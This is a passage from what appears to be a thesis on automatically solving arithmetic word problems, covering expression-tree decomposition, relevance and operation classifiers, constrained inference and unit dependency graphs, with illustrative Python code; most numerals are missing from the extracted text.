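    return is_monotonic(n.left) and is_monotonic(n.right)

def lca_operation(root, leaf_i, leaf_j):
    # returns the label of the case analysis above:
    # '+', '*', '-', '-_reverse', '/', '/_reverse'
    def contains(n, leaf):
        if n is leaf:
            return True
        if n.is_leaf():
            return False
        return contains(n.left, leaf) or contains(n.right, leaf)

    node = root
    while not node.is_leaf():
        # descend while both leaves fall in the same subtree
        if contains(node.left, leaf_i) and contains(node.left, leaf_j):
            node = node.left
        elif contains(node.right, leaf_i) and contains(node.right, leaf_j):
            node = node.right
        else:
            break
    order = contains(node.left, leaf_i) and contains(node.right, leaf_j)
    if node.op in ('+', '*'):
        return node.op
    return node.op if order else node.op + '_reverse'

for instance, a tree built as Node('*', Node('+', Node(value=2), Node(value=3)), Node(value=4)) evaluates to 20, satisfies the monotonicity conditions, and yields '+' as the lca operation of its two leftmost leaves (the numbers here are arbitrary and only serve the illustration); determining the lca operation for every pair of relevant quantities in this way is exactly the information the mapping step needs to recover.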
in fact, identifying the operation between any pair of quantities provides much needed redundancy given the uncertainty in identifying the operation from text, and we exploit it in our final joint inference. consequently, our overall method proceeds as follows: given the problem text p , we detect quantities q ,q , . . . ,qn. we then use two classifiers, one for relevance and other to predict the lca operations for a monotonic expression tree of the solution. our training makes use of the notion of quantity schemas, which we describe in section . . . the distributional output of these classifiers is then used in a joint inference procedure that determines the final expression tree. our training data consists of problem text paired with a monotonic expression tree for the solution expression and alignment of quantities in the expression to quantity mentions in the problem text. both the relevance and lca operation classifiers are trained on gold annotations. . . global inference for expression trees in this subsection, we define the scoring functions corresponding to the decomposed problems, and show how we combine these scores to perform global inference. for a problem p with quantities q ,q , . . . ,qn, we define the following scoring functions: . pair(qi,qj,op) : scores the likelihood of �lca(qi,qj,t ) = op, where t is a monotone expression tree of the solution expression of p . a multiclass classifier trained to predict lca operations (section . . ) can provide these scores. . irr(q) : scores the likelihood of quantity q being an irrelevant quantity in p , that is, q is not used in creating the solution. a binary classifier trained to predict whether a quantity q is relevant or not (section . . ), can provide these scores. for an expression e, let i(e) be the set of all quantities in p which are not used in expression e. let t be a monotonic expression tree for e. we define score(e) of an expression e in terms of the above scoring functions and a scaling parameter wirr as follows: score(e) =wirr ∑ q∈i(e) irr(q) + ∑ qi,qj /∈i(e) pair(qi,qj,�lca(qi,qj,t )) ( . ) our final expression tree is an outcome of a constrained optimization process, following [roth and yih, , chang et al., ]. our objective function makes use of the scores returned by irr(·) and pair(·) to deter- mine the expression tree and is constrained by legitimacy and background knowledge constraints, detailed below. . positive answer: most arithmetic problems asking for amounts or number of objects usually have a positive number as an answer. therefore, while searching for the best scoring expression, we reject expressions generating negative answer. . integral answer: problems with questions such as ‘how many” usually expect integral solutions. we only consider integral solutions as legitimate outputs for such problems. let c be the set of valid expressions that can be formed using the quantities in a problem p , and which satisfy the above constraints. the inference algorithm now becomes the following: arg max e∈c score(e) ( . ) the space of possible expressions is large, and we employ a beam search strategy to find the highest scoring constraint satisfying expression [chang et al., ]. we construct an expression tree using a bottom up approach, first enumerating all possible sets of irrelevant quantities, and next over all possible expressions, keeping the top k at each step. we give details below. . 
enumerating irrelevant quantities: we generate a state for all possible sets of irrelevant quantities, ensuring that there is at least two relevant quantities in each state. we refer to each of the relevant quantities in each state as a term. therefore, each state can be represented as a set of terms. . enumerating expressions: for generating a next state s′ from s, we choose a pair of terms ti and tj in s and one of the four basic operations, and form a new term by combining terms ti and tj with the operation. since we do not know which of the possible next states will lead to the optimal goal state, we enumerate all possible next states (that is, enumerate all possible pairs of terms and all possible operations); we prune the beam to keep only the top k candidates. we terminate when all the states in the beam have exactly one term. once we have a top k list of candidate expression trees, we choose the highest scoring tree which satisfies the constraints. however, there might not be any tree in the beam which satisfies the constraints, in which case, we choose the top candidate in the beam. we use k = in our experiments. in order to choose the value for the wirr, we search over the set { − , − , − , , , , }, and choose the parameter setting which gives the highest accuracy on the training data. . . quantity schema in order to generalize across problem types as well as over simple manipulations of the text, it is necessary to train our system only with relevant information from the problem text. e.g., for the problem in example . , we do not want to take decisions based on how tom earned money. therefore, there is a need to extract the relevant information from the problem text. to this end, we introduce the concept of a quantity schema which we extract for each quantity in the problem’s text. along with the question asked, the quantity schemas provides all the information needed to solve most arithmetic problems. a quantity schema for a quantity q in problem p consists of the following components. . associated verb for each quantity q, we detect the verb associated with it. we traverse up the dependency tree starting from the quantity mention, and choose the first verb we reach. we used the easy first dependency parser [goldberg and elhadad, ]. . subject of associated verb we detect the noun phrase, which acts as subject of the associated verb (if one exists). . unit we use a shallow parser to detect the phrase p in which the quantity q is mentioned. all tokens of the phrase (other than the number itself) are considered as unit tokens. also, if p is followed by the prepositional phrase “of” and a noun phrase (according to the shallow parser annotations), we also consider tokens from this second noun phrase as unit tokens. finally, if no unit token can be extracted, we assign the unit of the neighboring quantities as the unit of q (following previous work [hosseini et al., ]). . related noun phrases we consider all noun phrases which are connected to the phrase p containing quantity q, with np-pp-np attachment. if only one quantity is mentioned in a sentence, we consider all noun phrases in it as related. . rate we determine whether quantity q refers to a rate in the text, as well as extract two unit compo- nents defining the rate. for example, “ kilometers per hour” has two components “kilometers” and “hour”. similarly, for sentences describing unit cost like “each egg costs dollars”, “ ” is a rate, with units “dollars” and “egg”. 
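pulling together the pieces of this subsection, the following is a minimal sketch (in python) of a quantity schema record and of the constrained, beam-search inference over expressions described above; all class and function names are illustrative assumptions rather than the actual implementation, and the two scoring functions are left as stubs standing in for the trained classifiers.

# illustrative sketch of a quantity schema record and of the beam-search inference;
# names, signatures and the stub scorers are assumptions for exposition only.

from dataclasses import dataclass, field
from itertools import combinations

@dataclass
class QuantitySchema:
    value: float
    verb: str = ""                                   # associated verb
    subject: str = ""                                # subject of the associated verb
    unit: list = field(default_factory=list)         # unit tokens
    related_nps: list = field(default_factory=list)  # related noun phrases
    rate_unit: tuple = None                          # (num_unit, den_unit) if the quantity is a rate

# stub scorers standing in for the trained classifiers
def irr(q):            # likelihood that quantity q is irrelevant
    return 0.0

def pair(qi, qj, op):  # likelihood that op is the lca operation for the pair (qi, qj)
    return 0.0

OPS = ['+', '-', '-_reverse', '*', '/', '/_reverse']

def apply_op(a, b, op):
    return {'+': a + b, '-': a - b, '-_reverse': b - a,
            '*': a * b, '/': a / b, '/_reverse': b / a}[op]

def infer_expression(quantities, w_irr=1.0, beam_size=200):
    # a state is (list of terms, accumulated score); a term is (value, indices of quantities used)
    n = len(quantities)
    states = []
    # step 1: enumerate sets of irrelevant quantities, keeping at least two relevant ones
    for k in range(max(n - 1, 1)):
        for irrelevant in combinations(range(n), k):
            relevant = [i for i in range(n) if i not in irrelevant]
            if len(relevant) < 2:
                continue
            score = w_irr * sum(irr(quantities[i]) for i in irrelevant)
            terms = [(quantities[i].value, (i,)) for i in relevant]
            states.append((terms, score))
    # step 2: repeatedly combine pairs of terms with an operation, pruning to the beam size
    finished = []
    while states:
        next_states = []
        for terms, score in states:
            if len(terms) == 1:
                finished.append((terms[0][0], score))
                continue
            for a, b in combinations(range(len(terms)), 2):
                (va, qa), (vb, qb) = terms[a], terms[b]
                rest = [t for idx, t in enumerate(terms) if idx not in (a, b)]
                for op in OPS:
                    try:
                        new_term = (apply_op(va, vb, op), qa + qb)
                    except ZeroDivisionError:
                        continue
                    # combining two terms fixes the lca operation of every cross pair
                    new_score = score + sum(pair(quantities[i], quantities[j], op)
                                            for i in qa for j in qb)
                    next_states.append((rest + [new_term], new_score))
        states = sorted(next_states, key=lambda s: -s[1])[:beam_size]
    # pick the best candidate satisfying the positive-answer constraint
    # (the integral-answer check for "how many" questions is omitted here)
    finished.sort(key=lambda s: -s[1])
    for value, _ in finished:
        if value > 0:
            return value
    return finished[0][0] if finished else None

in the full system, the two stubs are replaced by the relevance and lca operation classifiers described below, which are trained on features drawn from these quantity schemas.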
in addition to extracting the quantity schemas for each quantity, we extract the surface form text which poses the question. for example, in the question sentence, “how much will john have to pay if he wants to buy oranges?”, our extractor outputs “how much will john have to pay” as the question. . . relevance classifier we train a binary svm classifier to determine, given problem text p and a quantity q in it, whether q is needed in the numeric expression generating the solution. we train on gold annotations and use the score of the classifier as the scoring function irr(·). features the features are extracted from the quantity schemas and can be broadly categorized into three groups: . unit features: most questions specifically mention the object whose amount needs to be computed, and hence questions provide valuable clue as to which quantities can be irrelevant. we add a feature for whether the unit of quantity q is present in the question tokens. also, we add a feature based on whether the units of other quantities have better matches with question tokens (based on the number of tokens matched), and one based on the number of quantities which have the maximum number of matches with the question tokens. . related np features: often units are not enough to differentiate between relevant and irrelevant quantities. consider the following: example . problem : there are apples in a pile on the desk. each apple comes in a package of . apples are added to the pile. how many apples are there in the pile? solution : ( + ) = the relevance decision depends on the noun phrase “the pile”, which is absent in the second sentence. we add a feature indicating whether a related noun phrase is present in the question. also, we add a feature based on whether the related noun phrases of other quantities have better match with the question. extraction of related noun phrases is described in section . . . . miscellaneous features: when a problem mentions only two quantities, both of them are usually relevant. hence, we also add a feature based on the number of quantities mentioned in text. we include pairwise conjunction of the above features. . . lca operation classifier in order to predict lca operations, we train a multiclass svm classifier. given problem text p and a pair of quantities pi and pj, the classifier predicts one of the six labels described in eq. . . we consider the confidence scores for each label supplied by the classifier as the scoring function pair(·). features we use the following categories of features: . individual quantity features: dependent verbs have been shown to play significant role in solving addition and subtraction problems [hosseini et al., ]. hence, we add the dependent verb of the quantity as a feature. multiplication and division problems are largely dependent on rates described in text. to capture that, we add a feature based on whether the quantity is a rate, and whether any component of rate unit is present in the question. in addition to these quantity schema features, we add selected tokens from the neighborhood of the quantity mention. neighborhood of quantities are often highly informative of lca operations, for example, “he got more marbles”, the term “more” usually indicates addition. we add as features adverbs and comparative adjectives mentioned in a window of size around the quantity mention. . 
quantity pair features: for a pair (qi,qj) we add features to indicate whether they have the same dependent verbs, to indicate whether both dependent verbs refer to the same verb mention, whether the units of qi and qj are the same and, if one of them is a rate, which component of the unit matches with the other quantity’s unit. finally, we add a feature indicating whether the value of qi is greater than the value of qj. . question features: finally, we add a few features based on the question asked. in particular, for arithmetic problems where only one operation is needed, the question contains signals for the required operation. specifically, we add indicator features based on whether the question mentions comparison- related tokens (e.g., “more”, “less” or “than”), or whether the question asks for a rate (indicated by tokens such as “each” or “one”). we include pairwise conjunction of the above features. for both classifiers, we use the illinois-sl package under default settings. . experimental results ai il cc relax strict relax strict relax strict all features . . . . . . no individual quantity features . . . . . . no quantity pair features . . . . . . no question features . . . . . . table . : performance of lca operation classifier on the datasets ai , il and cc. in this section, we evaluate the proposed method on publicly available datasets of arithmetic word problems. we evaluate separately the relevance and lca operation classifiers, and show the contribution of various features. lastly, we evaluate the performance of the full system, and quantify the gains achieved by the constraints. . . datasets we evaluate our system on three datasets, each of which comprise a different category of arithmetic word problems. . ai dataset: this is a collection of addition and subtraction problems, released by [hosseini et al., ]. they performed a -fold cross validation, with every fold containing problems http://cogcomp.cs.illinois.edu/page/software view/illinois-sl from different sources. this helped them evaluate robustness to domain diversity. we follow the same evaluation setting. . il dataset: this is a collection of arithmetic problems released by [roy et al., ]. each of these problems can be solved by performing one operation. however, there are multiple problems having the same template. to counter this, we perform a few modifications to the dataset. first, for each problem, we replace the numbers and nouns with the part of speech tags, and then we cluster the problems based on unigrams and bigrams from this modified problem text. in particular, we cluster problems together whose unigram-bigram similarity is over %. we next prune each cluster to keep at most problems in each cluster. finally we create the folds ensuring all problems in a cluster are assigned to the same fold, and each fold has similar distribution of all operations. we have a final set of problems, and we use a -fold cross validation to evaluate on this dataset. . commoncore dataset: in order to test our system’s ability to handle multi-step problems, we create a new dataset of multi-step arithmetic problems. the problems were extracted from www.commoncoresheets.com. in total, there were problems, for each of the following types: (a) addition followed by subtraction (b) subtraction followed by addition (c) addition and multiplication (d) addition and division (e) subtraction and multiplication (f) subtraction and division this dataset had no irrelevant quantities. 
therefore, we did not use the relevance classifier in our evaluations. in order to test our system’s ability to generalize across problem types, we perform a -fold cross validation, with each fold containing all the problems from one of the aforementioned categories. this is a more challenging setting relative to the individual data sets mentioned above, since we are evaluating on multi-step problems, without ever looking at problems which require the same set of operations. . . relevance classifier table . evaluates the performance of the relevance classifier on the ai and il datasets. we report two accuracy values: relax - fraction of quantities which the classifier got correct, and strict - fraction of math problems, for which all quantities were correctly classified. we report accuracy using all features and then removing each feature group, one at a time. ai il relax strict relax strict all features . . . . no unit features . . . . no np features . . . . no misc. features . . . . table . : performance of relevance classifier on the datasets ai and il. we see that features related to units of quantities play the most significant role in determining relevance of quantities. also, the related np features are not helpful for the ai dataset. . . lca operation classifier table . evaluates the performance of the lca operation classifier on the ai , il and cc datasets. as before, we report two accuracies - relax - fraction of quantity pairs for which the classifier correctly predicted the lca operation, and strict - fraction of math problems, for which all quantity pairs were correctly classified. we report accuracy using all features and then removing each feature group, one at a time. the strict and relaxed accuracies for il dataset are identical, since each problem in il dataset only requires one operation. the features related to individual quantities are most significant; in particular, the accuracy goes to . in the cc dataset, without using individual quantity features. the question features are not helpful for classification in the cc dataset. this can be attributed to the fact that all problems in cc dataset require multiple operations, and questions in multi-step problems usually do not contain information for each of the required operations. . . global inference module table . shows the performance of our system in correctly solving arithmetic word problems. we show the impact of various constraints, and also compare against previously best known results on the ai and il datasets. we also show results using each of the two constraints separately, and using no constraints at all. ai il cc all constraints . . . positive constraint . . . integral constraint . . . no constraint . . . [hosseini et al., ] . - - [roy et al., ] - . - [kushman et al., ] . . . table . : accuracy in correctly solving arithmetic problems. first four rows represent various configurations of our system. we achieve state of the art results in both ai and il datasets. the previously known best result in the ai dataset is reported in [hosseini et al., ]. since we fol- low the exact same evaluation settings, our results are directly comparable. we achieve state of the art results, without having access to any additional annotated data, unlike [hosseini et al., ], who use labeled data for verb categorization. for the il dataset, we acquired the system of [roy et al., ] from the authors, and ran it with the same fold information. we outperform their system by an ab- solute gain of over %. 
we believe that the improvement was mainly due to the dependence of the system of [roy et al., ] on lexical and neighborhood of quantity features. in contrast, features from quantity schemas help us generalize across problem types. finally, we also compare against the template based system of [kushman et al., ]. [hosseini et al., ] mentions the result of running the system of [kushman et al., ] on ai dataset, and we report their result here. for il and cc datasets, we used the system released by [kushman et al., ]. the integrality constraint is particularly helpful when division is involved, since it can lead to fractional answers. it does not help in case of the ai dataset, which involves only addition and subtraction problems. the role of the constraints becomes more significant in case of multi-step problems and, in particular, they contribute an absolute improvement of over % over the system without constraints on the cc dataset. the template based system of [kushman et al., ] performs on par with our system on the il dataset. we believe that it is due to the small number of equation templates in the il dataset. it performs poorly on the cc dataset, since we evaluate on unseen problem types, which do not ensure that equation templates in the test data will be seen in the training data. . . discussion the leading source of errors for the classifiers are erroneous quantity schema extraction and lack of under- standing of unknown or rare verbs. for the relevance classifier on the ai dataset, % of the errors were due to mistakes in extracting the quantity schemas and % could be attributed to rare verbs. for the lca operation classifier on the same dataset, % of the errors were due to unknown verbs and % were due to mistakes in extracting the schemas. the erroneous extraction of accurate quantity schemas is very significant for the il dataset, contributing % of the errors for the relevance classifier and % of the errors for the lca operation classifier. for the operation classifier on the cc dataset, % of the errors were due to verbs and % were due to faulty quantity schema extraction. quantity schema extraction is challenging due to parsing issues as well as some non-standard rate patterns, and it will be one of the future work targets. for example, in the sentence, “how many -dollar toys can he buy?”, we fail to extract the rate component of the quantity . . conclusion in this chapter, we present a novel method for understanding and solving a general class of arithmetic word problems. our approach can solve all problems whose solution can be expressed by a read-once arithmetic expression, where each quantity from the problem text appears at most once in the expression. we de- velop a novel theoretical framework, centered around the notion of monotone expression trees, and showed how this representation can be used to get a unique decomposition of the problem. this theory natu- rally leads to a computational solution that we have shown to uniquely determine the solution - determine the arithmetic operation between any two quantities identified in the text. this theory underlies our al- gorithmic solution - we develop classifiers and a constrained inference approach that exploits redundancy in the information, and show that this yields strong performance on several benchmark collections. 
in particular, our approach achieves state of the art performance on two publicly available arithmetic prob- lem datasets and can support natural generalizations for quantitative reasoning over multiple quantities in text. specifically, our approach performs competitively on multistep problems, even when it has never observed the particular problem type before. the datasets used in this work are available for download at http://cogcomp.cs.illinois.edu/page/resource view/ . chapter unit dependency graphs . introduction most statistical word problem solvers till now (including the one described in the last chapter) were entirely data-driven. they depend on training examples to learn all the concepts needed for math word problem solving. however, often domain knowledge is needed for quantitative reasoning, which is not easy to learn from training data. dimensional analysis is an example of this kind of domain knowledge. applying the knowledge of dimensional analysis to the units of quantities can inform several quantitative inferences as exemplified below. let us look at the arithmetic word problem in example . . the units of “ ” and “ ” are both “flowers”, which indicate they can be added or subtracted. although unit of “ ” is also “flower”, it is associated with a rate, indicating the number of flowers in each bouquet. as a result, “ ” effectively has unit “flowers per bouquet”. detecting such rate units and applying dimensional analysis help understand that “ ” will more likely be multiplied or divided to arrive at the solution. finally, the question asks for the number of “bouquets”, indicating “ ” will likely be divided, and not multiplied. knowing such interactions could help understand the situation and perform better quantitative reasoning. in addition, given that unit extraction is a noisy process, this can make it more robust via global reasoning. this is exactly the focus of this chapter – to integrate domain knowledge about dimensional analysis into statistical methods for word problem solving. example . isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? we introduce the concept of unit dependency graph (udg) for math word problems, to represent the re- lationships among the units of different numbers, and the question being asked. we also introduce a strategy to extract annotations for unit dependency graphs, with minimal additional annotations. in particular, we use the answers to math problems, along with the rate annotations for a few selected problems, to generate complete annotations for unit dependency graphs. finally, we develop a decomposed model to predict udg given an input math word problem. we augment the arithmetic word problem solver of [roy and roth, ] to predict a unit dependency graph, along with the solution expression of the input arithmetic word problem. forcing the solver to respect the dependencies of the unit dependency graph enables us to improve unit extractions, as well as leverage the domain knowledge about unit dependencies in math reasoning. the introduction of unit dependency graphs reduced the error of the solver by over %, while also making it more robust to reduction in lexical and template overlap of the dataset. . unit dependency graph we first introduce the idea of a generalized rate, and its unit representation. 
we define rate to be any quantity which is some measure corresponding to one unit of some other quantity. this includes explicit rates like “ miles per hour”, as well as implicit rates like the one in “each student has books”. consequently, units for rate quantities take the form “a per b”, where a and b refer to different entities. we refer to a as num unit (short for numerator unit), and b as den unit (short for denominator unit). table . shows examples of num and den units for various rate mentions. mention num unit den unit miles per hour mile hour each student has books. book student table . : units of rate quantities a unit dependency graph (udg) of a math word problem is a graph representing the relations among quantity units and the question asked. fig. . shows an example of a math word problem and its unit dependency graph. for each quantity mentioned in the problem, there exists a vertex in the unit dependency graph. in addition, there is also a vertex representing the question asked. therefore, if a math problem mentions n quantities, its unit dependency graph will have n + vertices. in the example in fig . , there is one vertex corresponding to each of the quantities , and , and one vertex representing the question part “how many bouquets could she still make ?”. problem isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? unit dependency graph how many bouquets rate num unit den unit num unit same unit expression tree of solution − ÷ figure . : an arithmetic word problem, its udg, and a tree representation of the solution ( − )/ . several dependencies exist between the udg and the final solution of a problem. here, “ ” and “ ” are connected via same unit edge, hence they can be added or subtracted, “ ” is connected by den unit to the question, indicating that some expression will be divided by “ ” to get the answer’s unit. a vertex representing a number, is labeled rate, if the corresponding quantity describes a rate relation- ship (according to the aforementioned definition). in fig . , “ ” is labeled as a rate since it indicates the number of flowers in each bouquet. similarly, a vertex corresponding to the question is marked rate if the question asks for a rate. edges of a udg can be directed as well as undirected. each undirected edge has the label same unit, indicating that the connected vertices have the same unit. each directed edge going from vertex u to vertex v can have one of the following labels: . num unit : valid only for directed edges with source vertex u labeled as rate, indicates that num unit of u matches the unit of the destination vertex v. . den unit : valid only for directed edges with source vertex labeled as rate, indicates that den unit of source vertex u matches the unit of the destination vertex v. if no edge exists between a pair of vertices, they have unrelated units. several dependencies exist between the vertex and edge labels of the unit dependency graph of a problem, and its solution expression. sec . . discusses these dependencies and how they can be leveraged to improve math problem solving. . learning to predict udgs predicting udg for a math word problem is essentially a structured prediction problem. however, since we have limited training data, we develop a decomposed model to predict parts of the structure inde- pendently, and then perform joint inference to enforce coherent predictions. 
this has been shown to be an effective method for structured prediction in the presence of limited data [punyakanok et al., b, sutton and mccallum, ]. empirically, we found our decomposed model to be superior to jointly trained alternatives (see section . ). our decomposed model for udg prediction uses the following two classifiers. . vertex classifier : this is a binary classifier, which takes a vertex of the udg as input, and decides whether it denotes a rate. . edge classifier : this is a multiclass classifier, which takes as input a pair of nodes of the udg, and predicts the properties of the edge connecting those nodes. finally, a constrained inference module combines the output of the two classifiers to construct a udg. we provide details of the components in the following subsections. . . vertex classifier in order to detect rate quantities, we train a binary classifier. given problem text p and a vertex v of the udg, the classifier predicts whether v represents a rate. it predicts one of two labels - rate or not rate. the vertex v is either a quantity mentioned in p , or the question of p . the features used for the classification are as follows : . context features: we add unigrams, bigrams, part of speech tags, and their conjunctions from the neighborhood of v. . rule based extraction features: we add a feature indicating whether a rule based approach can detect v as a rate. . . edge classifier we train a multiclass classifier to determine the properties of the edges of the udg. given problem text p and a pair of vertices vi and vj (i < j), the classifier predicts one of the six labels : . same unit : indicates that vi and vj should be connected by an undirected edge labeled same unit. . no relation : indicates no edge exists between vi and vj. . rate→num : indicates that vi is a rate, and the num unit of vi matches the unit of vj. . rate←num : indicates that vj is a rate, and the num unit of vj matches the unit of vi. . we similarly define rate→den and rate ← den. the features used for the classification are : . context features: for each vertex v in the query, we add the context features described for vertex classifier. . rule based extraction features: we add a feature indicating whether each of the queried vertices is detected as a rate by the rule based system. in addition, we also add features denoting whether there are common tokens in the units of vi and vj. . . constrained inference our constrained inference module takes the scores of the vertex and edge classifiers, and combines them to find the most probable unit dependency graph for a problem. we define vertex(v,l) to be the score predicted by the vertex classifier for labeling vertex v of a udg with label l, where l ∈{rate,not rate}. similarly, we define edge(vi,vj, l) to be the score predicted by the edge classifier for the assignment of label l to the edge between vi and vj. here the label l is one of the six labels defined for the edge classifier. let g be a udg with vertex set v . we define the score for g as follows: score(g) = ∑ v∈v label(g,v)=rate vertex(v,rate) + λ× ∑ vi,vj∈v,i<j edge(vi,vj,label(g,vi,vj)) where λ is a scaling factor, and label maps labels of the udg, to the labels of the corresponding classifiers. label(g,v) maps to rate, if v is a rate, otherwise it maps to not rate. similarly, if no edge exists between vi and vj, label(g,vi,vj) maps to no relation, if num unit of vi matches the unit of vj, label(g,vi,vj) maps to rate → num, and so on. 
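as an illustration, the following sketch (in python) shows how a candidate udg and the decomposed score just defined could be computed from the two classifier scores; the representation and the names used here are assumptions made for exposition, not the system's actual data structures.

# illustrative sketch of a candidate unit dependency graph and its decomposed score;
# vertex_score and edge_score stand in for the trained vertex and edge classifiers.

from itertools import combinations

EDGE_LABELS = ['SAME_UNIT', 'NO_RELATION',
               'RATE_TO_NUM', 'NUM_TO_RATE',   # rate->num and rate<-num
               'RATE_TO_DEN', 'DEN_TO_RATE']   # rate->den and rate<-den

class UDG:
    def __init__(self, num_quantities):
        # one vertex per quantity plus one vertex for the question
        self.vertices = list(range(num_quantities)) + ['question']
        self.vertex_label = {v: 'NOT_RATE' for v in self.vertices}
        self.edge_label = {}   # keyed by vertex pairs (vi, vj); missing pairs mean no relation

# stub scores standing in for the trained vertex and edge classifiers
def vertex_score(problem, v, label):
    return 0.0

def edge_score(problem, vi, vj, label):
    return 0.0

def udg_score(problem, g, lam=1.0):
    # score(g): rate-vertex scores plus lambda times the edge-label scores
    s = sum(vertex_score(problem, v, 'RATE')
            for v in g.vertices if g.vertex_label[v] == 'RATE')
    s += lam * sum(edge_score(problem, vi, vj,
                              g.edge_label.get((vi, vj), 'NO_RELATION'))
                   for vi, vj in combinations(g.vertices, 2))
    return s

the inference then searches over all graphs of this form whose vertex and edge labels are mutually consistent, returning the highest-scoring one, as stated next.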
finally, the inference problem has the following form: arg max g∈graphs score(g) where graphs is the set of all valid unit dependency graphs for the input problem. . joint inference with an arithmetic solver in this section, we describe our joint inference procedure to predict both a udg and the solution of an input arithmetic word problem. our model is built on the arithmetic word problem solver of [roy and roth, ], and we briefly describe it in the following sections. we first describe the concept of expression trees, and next describe the solver, which leverages expression tree representation of the solutions. . . monotonic expression tree an expression tree is a binary tree representation of a mathematical expression, where leaves represent numbers, and all non-leaf nodes represent operations. fig . shows an example of an arithmetic word problem and the expression tree of the solution mathematical expression. a monotonic expression tree is a normalized expression tree representation for math expressions, which restricts the order of combination of addition and subtraction nodes, and multiplication and division nodes. the expression tree in fig . is monotonic. . . arithmetic word problem solver we now describe the solver pipeline of [roy and roth, ]. given a problem p with quantities q ,q , . . . ,qn, the solver uses the following two classifiers. . irrelevance classifier : given as input, problem p and quantity qi mentioned in p , the classifier decides whether qi is irrelevant for the solution. the score of this classifier is denoted as irr(q). . lca operation classsifier : given as input, problem p and a pair of quantities qi and qj (i < j), the classifier predicts the operation at the lowest common ancestor (lca) node of qi and qj, in the solution expression tree of problem p. the set of possible operations are +, −, −r, ×, ÷ and ÷r (the subscript r indicates reverse order). considering only monotonic expression trees for the solution makes this operation unique for any pair of quantities. the score of this classifier for operation o is denoted as lca(qi,qj,o). the above classifiers are used to gather irrelevance scores for each number, and lca operation scores for each pair of numbers. finally, constrained inference procedure combines these scores to generate the solution expression tree. let i(t) be the set of all quantities in p which are not used in expression tree t, and λirr be a scaling parameter. the score score(t) of an expression tree t is defined as: score(t) = λirr ∑ q∈i(t ) irr(q) + ∑ qi,qj /∈i(t ) lca(qi,qj,�lca(qi,qj,t)) where �lca(qi,qj,t) denotes the operation at the lowest common ancestor node of qi and qj in monotonic expression tree t . let trees be the set of valid expressions that can be formed using the quantities in a problem p , and also give positive solutions. the inference algorithm now becomes: arg max t∈trees score(t) . . joint inference we combine the scoring functions of udg prediction and the ones from the solver of [roy and roth, ], so that we can jointly predict the udg and the solution of the problem. for an input arithmetic word problem p , we score tuples (g,t) (where g is a candidate udg for p , and t is a candidate solution expression tree of p) as follows : score(g,t) =λirr ∑ q∈i(t ) irr(q) + ∑ qi,qj /∈i(t ) lca(qi,qj,�lca(qi,qj,t))+ λvertex ∑ v∈v label(g,v)=rate vertex(v,rate) + λedge ∑ vi,vj∈v,i<j edge(vi,vj,label(g,vi,vj)) where λirr, λvertex and λedge are scaling parameters. 
this is simply a scaled addition of the scores for udg prediction and solution expression generation. finally, the inference problem is arg max (g,t )∈tuples score(g,t) where tuples is the set of all tuples (g,t), such that g ∈ graphs, t ∈ trees, and g is a consistent udg for the solution tree t. . . consistent rate unit graphs we have a set of conditions to check whether g is a consistent udg for monotonic tree t . most of these conditions are expressed in terms of path(t,vi,vj), which takes as input a pair of vertices vi,vj of the udg g, and a monotonic expression tree t , and returns the following. . if both vi and vj are numbers, and their corresponding leaf nodes in t are ni and nj respectively, then it returns the nodes in the path connecting ni and nj in t. . if only vi denotes a number (implying vj represents the question), the function returns the nodes in the path from ni to the root of t, where ni is the corresponding leaf node for vi. for the unit dependency graph and solution tree t of fig . , path(t, , ) is {−,÷}, whereas path(t, , question) is {÷}. finally, the conditions for consistency between a udg g and an expression tree t are as follows: . if vi is the only vertex labeled rate and it is the question, there should not exist a path from some leaf n to the root of t which has only addition, subtraction nodes. if that exists, it implies n can be added or subtracted to get the answer, that is, the corresponding vertex for n in g has same unit as the question, and should have been labeled rate. . if vi is labeled rate and the question is not, the path from ni (corresponding leaf node for vi) to the root of t cannot have only addition, subtraction nodes. otherwise, the question will have same rate units as vi. . we also check whether the edge labels are consistent with the vertex labels using algorithm , which computes edge labels of udgs, given the expression tree t , and vertex labels. it uses heuristics like if a rate r is being multiplied by a non-rate number n, the den unit of r should match the unit of n, etc. algorithm edgelabel input: monotonic expression tree t , vertex pairs vi,vj, and their corresponding vertex labels output: label of edge between vi and vj : path ← path(t,vi,vj) : countmuldiv ← number of multiplication and division nodes in path : if vi and vj have same vertex label, and countmuldiv = then : return same unit : end if : if vi and vj have different vertex labels, and countmuldiv = then : if path contains × and vi is rate then : return rate→den : end if : if path contains × and vj is rate then : return rate←den : end if : if path contains ÷ and vi is rate then : return rate→num : end if : if path contains ÷r and vj is rate then : return rate←num : end if : end if : return cannot determine edge label these consistency conditions prevent the inference procedure from considering any inconsistent tuples. they help the solver to get rid of erroneous solutions which involve operations inconsistent with all high scoring udgs. finally, in order to find the highest scoring consistent tuple, we have to enumerate the members of tuples, and score them. the size of tuples however is exponential in the number of quantities in the problem. as a result, we perform beam search to get the highest scoring tuple. we first enumerate the members of trees, and next for each member of trees, we enumerate consistent udgs. . experiments in this section, we evaluate our proposed method, and quantify the gains achieved by using udgs in solving arithmetic word problems. . . 
dataset we detected several issues in the existing datasets for arithmetic word problem solvers, and how they were used for evaluation. the evaluation in the last chapter was done separately on different types of arithmetic problems. this does not capture how well the systems can distinguish between these different problem types. datasets released by [roy and roth, ] and [koncel-kedziorski et al., ] mention irrelevant quantities in words, and only the relevant quantities are mentioned in digits. this removes the challenge of detecting extraneous quantities. also, the folds for commoncore dataset were created in an adverserial manner to force the systems to only test on unseen equation forms. this seems too harsh for template based systems, who search the output space based on previously seen equation forms. in order to address the aforementioned issues, we pooled arithmetic word problems from all available datasets [hosseini et al., , roy and roth, , koncel-kedziorski et al., ], and normalized all men- tions of quantities to digits. we next prune problems such that there do not exist a problem pair with over % match of unigrams and bigrams. the threshold of % was decided manually by determining that problems with around % overlap are sufficiently different. we finally ended up with problems. we refer to this dataset as allarith. we also create subsets of allarith using the mawps system [koncel-kedziorski et al., ]. mawps can generate subsets of word problems based on lexical and template overlap. lexical overlap is a measure of reuse of lexemes among problems in a dataset. high lexeme reuse allows for spurious associations between the problem text and a correct solution [koncel-kedziorski et al., ]. evaluating on low lexical overlap subset of the dataset can show the robustness of solvers to lack of spurious associations. template overlap is a measure of reuse of similar equation templates across the dataset. several systems focus on solving problems under the assumption that similar equation templates have been seen at training time. evaluating on low template overlap subset can show the reliance of systems on the reuse of equation templates. we create two subsets of problems each - one with low lexical overlap called allarithlex, and one with low template overlap called allarithtmpl. we report 